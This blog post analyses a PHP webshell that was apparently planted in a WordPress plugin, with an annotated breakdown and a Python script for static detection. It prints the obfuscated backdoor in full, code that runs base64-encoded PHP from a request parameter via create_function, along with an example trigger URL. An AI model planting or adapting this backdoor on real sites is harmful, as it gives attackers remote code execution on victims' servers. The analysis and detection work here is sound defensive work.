PHP Security: Analysing a webshell

Published by TELstatic on 2019-12-02

Introduction

A webshell is a command-execution environment that exists as a web page file such as asp, php, jsp or cgi; it can also be described as a web backdoor. After breaking into a website, an attacker typically mixes an asp or php backdoor file in among the legitimate page files under the web server's WEB directory, then accesses the asp or php backdoor through a browser to obtain a command-execution environment and thereby control the web server. [1]

Analysis

On 27 November 2019 a WordPress site became unreachable. Investigation showed that the WordPress plugin sodium_compat had been tampered with; the code is shown below. How the attacker injected it is still unknown. The injected content is a typical webshell backdoor: it relies on PHP's create_function and base64_decode functions, and uses extensive string manipulation to evade webshell detection.

Source

$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";

$kHTiDsnt7866 = "";

foreach([3,38,5,23] as $E){
   $kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}

if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
    $DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
    $EqHZGFsG5581 = "";
    $DmPqoAru8529 = "";

    /*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/

    foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
       $EqHZGFsG5581 .= $ALpmKtOl8475[$E];
    }

    /*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/

    foreach([3,23,5,5,16,34] as $E){
       $DmPqoAru8529 .= $ALpmKtOl8475[$E];
    }

    /*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/

    $E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');

    $E = $E("", $EqHZGFsG5581($DDebczKe7430));

    $E();
    exit();
}

Annotated breakdown

$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";

$kHTiDsnt7866 = "";

foreach([3,38,5,23] as $E){
   $kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}

## $kHTiDsnt7866 => the string "sort": the request parameter that carries the injected code

## only act on requests that carry that parameter
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
    $DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
    $EqHZGFsG5581 = "";
    $DmPqoAru8529 = "";

    /*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/

    foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
       $EqHZGFsG5581 .= $ALpmKtOl8475[$E];
    }

## $EqHZGFsG5581 => the function base64_decode
    /*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/

    foreach([3,23,5,5,16,34] as $E){
       $DmPqoAru8529 .= $ALpmKtOl8475[$E];
    }

## $DmPqoAru8529 => the function strrev
    /*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/

    $E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');

    ## $E => create_function (the reversed literal "noitcnuf_etaerc")

    $E = $E("", $EqHZGFsG5581($DDebczKe7430));

    ## $DDebczKe7430 => the injected code, base64-encoded
    ## Example: echo phpinfo(); base64-encoded gives ZWNobyBwaHBpbmZvKCk7
    ## Requesting http://${wordpress.site}/wp-admin/wp-includes/sodium_compat/lib/constants.php?sort=ZWNobyBwaHBpbmZvKCk7 prints the phpinfo output; if the production server has not disabled functions such as exec and system, the consequences are severe.

    $E();
    exit();
}
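
The breakdown above replays the loader by hand. The following script, added to this post as an illustration (it is not the attacker's code and not part of the original post), does the same replay statically: it reads the character table and the index arrays out of the PHP source, recovers the real function names and the request parameter, and emits the indicators a file scanner could use to flag this loader without ever executing it. The regular expressions are an assumption tuned to this loader's shape, not a general PHP parser, and the sample source is the post's loader with the long filler comments shortened.

```python
"""Static triage of the index-lookup webshell loader analysed in this post."""
import base64
import re

# Constructed sample: the loader from the post with its filler comments shortened.
SAMPLE = r'''
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
   $kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
if(isset($_REQUEST /*IlrKKxaEyQ*/["$kHTiDsnt7866"])){
    $DDebczKe7430 = $_REQUEST /*IlrKKxaEyQ*/["$kHTiDsnt7866"];
    $EqHZGFsG5581 = "";
    $DmPqoAru8529 = "";
    foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
       $EqHZGFsG5581 .= $ALpmKtOl8475[$E];
    }
    foreach([3,23,5,5,16,34] as $E){
       $DmPqoAru8529 .= $ALpmKtOl8475[$E];
    }
    $E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
    $E = $E("", $EqHZGFsG5581($DDebczKe7430));
    $E();
    exit();
}
'''

# Assumption: these patterns match this loader family only, not arbitrary PHP.
STRING_ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)";')
LOOKUP_LOOP_RE = re.compile(
    r'foreach\(\[([\d,\s]+)\]\s+as\s+\$\w+\)\s*\{\s*'
    r'\$(\w+)\s*\.=\s*\$(\w+)\[\$\w+\];\s*\}')
CALL_ON_LITERALS_RE = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\(((?:'[^']*'\.?)+)\);")
REQUEST_PARAM_RE = re.compile(r'\$_REQUEST\s*(/\*.*?\*/)?\s*\["\$(\w+)"\]')
DANGEROUS = {"create_function", "base64_decode", "eval", "assert", "system", "exec"}


def recover_names(src):
    """Replay the character-table lookups and the strrev'd literal without running PHP."""
    tables = dict(STRING_ASSIGN_RE.findall(src))
    names = {}
    # foreach([i,j,...] as $E){ $target .= $table[$E]; }  ->  indexed characters
    for indices, target, table in LOOKUP_LOOP_RE.findall(src):
        if table in tables:
            chars = tables[table]
            names[target] = "".join(chars[int(i)] for i in indices.split(","))
    # $target = $fn('a'.'b'...)  ->  the joined literal, reversed if $fn is strrev
    for target, fn, pieces in CALL_ON_LITERALS_RE.findall(src):
        literal = "".join(re.findall(r"'([^']*)'", pieces))
        if names.get(fn) == "strrev":
            literal = literal[::-1]
        names[target] = literal
    return names


def find_request_parameter(src, names):
    """Name of the $_REQUEST key the loader listens on, resolved through the lookups."""
    m = REQUEST_PARAM_RE.search(src)
    if not m:
        return None
    return names.get(m.group(2), "$" + m.group(2))


def indicators(src, names):
    """Heuristics a file scanner can apply; each hit is a reason to quarantine the file."""
    hits = []
    if LOOKUP_LOOP_RE.search(src):
        hits.append("function name built by indexing a character table")
    if re.search(r"\$_REQUEST\s*/\*", src):
        hits.append("comment inserted between $_REQUEST and its subscript")
    for var, name in names.items():
        if name in DANGEROUS:
            hits.append(f"${var} resolves to {name}")
    return hits


def analyze(src):
    names = recover_names(src)
    return {"names": names,
            "parameter": find_request_parameter(src, names),
            "indicators": indicators(src, names)}


def decode_payload(value):
    """Decode a parameter value captured in an access log back to the PHP it ran."""
    return base64.b64decode(value).decode("utf-8", errors="replace")


if __name__ == "__main__":
    report = analyze(SAMPLE)
    for var, name in report["names"].items():
        print(f"${var} -> {name}")
    print("request parameter:", report["parameter"])
    for hit in report["indicators"]:
        print("indicator:", hit)
    print("decoded sample payload:", decode_payload("ZWNobyBwaHBpbmZvKCk7"))
```

Running it on the sample recovers sort, base64_decode, strrev and create_function and reports the three indicators; decode_payload turns the post's example value back into "echo phpinfo();", which is the step to apply to any ?sort= values found in the web server's access logs when scoping what was executed. Two further points for the clean-up: create_function was deprecated in PHP 7.2 and removed in PHP 8.0, so on a current PHP build this loader fails at the $E("", ...) call, and the php.ini directive disable_functions is the place to switch off exec, system and similar functions that the post warns about.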

References

  1. Baidu Baike: webshell
This work is licensed under the CC licence; reproduction must credit the author and link to this article.
